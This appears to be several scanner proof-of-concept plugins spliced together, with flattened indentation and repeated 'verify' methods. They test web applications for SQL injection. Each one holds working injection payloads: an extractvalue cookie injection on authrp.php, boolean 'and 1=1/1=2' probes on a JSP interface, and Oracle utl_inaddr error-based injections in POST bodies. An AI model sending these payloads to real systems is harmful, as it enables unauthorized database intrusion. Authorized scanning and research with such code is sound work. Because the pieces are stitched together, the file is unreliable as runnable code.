cookie = 'reachstone_uid=1 and extractvalue(0x1,concat(0x23,md5(1)))'
url = arg + '/include/authrp.php'
code, head, res, err, _ = hh.http(url, cookie=cookie)
if (code == 200) and (md5_1 in res):
#security_hole('SQL Injection: {url} Cookie: {cookie}'.format(url=url,cookie=cookie))
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
hh = hackhttp.hackhttp()
arg = self.target
for id in range(1, 10):
payload = '/vc/vc/interface/styletop/coltop_interface.jsp?i_id=%s' % id
target = arg + payload
code, head, res, errcode, _ = hh.http(target)
if code == 200 and '没有数据' not in res:
code1, head1, res1, errcode1, _1 = hh.http(target +
'%20and%201=1')
code2, head2, res2, errcode2, _2 = hh.http(target +
'%20and%201=2')
if code == code1 and res == res1:
if res1 != res2:
# security_hole(target)
self.output.report(
self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
break
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
hh = hackhttp.hackhttp()
# __Refer___ = http://www.wooyun.org/bugs/wooyun-2010-065322
payload = '/ACTIONQUERYELECTIVERESULTBYTEACHSECRETARY.APPPROCESS?mode=2'
target = self.target + payload
posts = [
"bt_DYXZ=%b4%f2%d3%a1%d1%a1%d6%d0&bt_FXXD=%b7%b4%cf%f2%d1%a1%b6%a8&bt_QBCX=%c8%ab%b2%bf%b3%b7%cf%fa&bt_QBXZ=%c8%ab%b2%bf%d1%a1%d6%d0&CourseModeID=1)%20and%201=utl_inaddr.get_host_address('hen'||'tai')%20and%20(1=1&ReportTitle=%b9%fe%b6%fb%b1%f5%c9%cc%d2%b5%b4%f3%d1%a72014-2015%d1%a7%c4%ea%b5%da%b6%fe%d1%a7%c6%da%c9%cf%bf%ce%d1%a7%c9%fa%c3%fb%b5%a5&ScheduleSwitch=0&TeacherNO=130112&YearTermNO=16",
"bt_DYXZ=%b4%f2%d3%a1%d1%a1%d6%d0&bt_FXXD=%b7%b4%cf%f2%d1%a1%b6%a8&bt_QBCX=%c8%ab%b2%bf%b3%b7%cf%fa&bt_QBXZ=%c8%ab%b2%bf%d1%a1%d6%d0&CourseModeID=1&ReportTitle=%b9%fe%b6%fb%b1%f5%c9%cc%d2%b5%b4%f3%d1%a72014-2015%d1%a7%c4%ea%b5%da%b6%fe%d1%a7%c6%da%c9%cf%bf%ce%d1%a7%c9%fa%c3%fb%b5%a5&ScheduleSwitch=0&TeacherNO=1&YearTermNO=1%20and%201=utl_inaddr.get_host_address('hen'||'tai')"
]
for post in posts:
code, head, body, errcode, final_url = hh.http(target,
post=post)
if code == 200 and 'hentai' in body:
#security_warning(target+' has post inject')
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
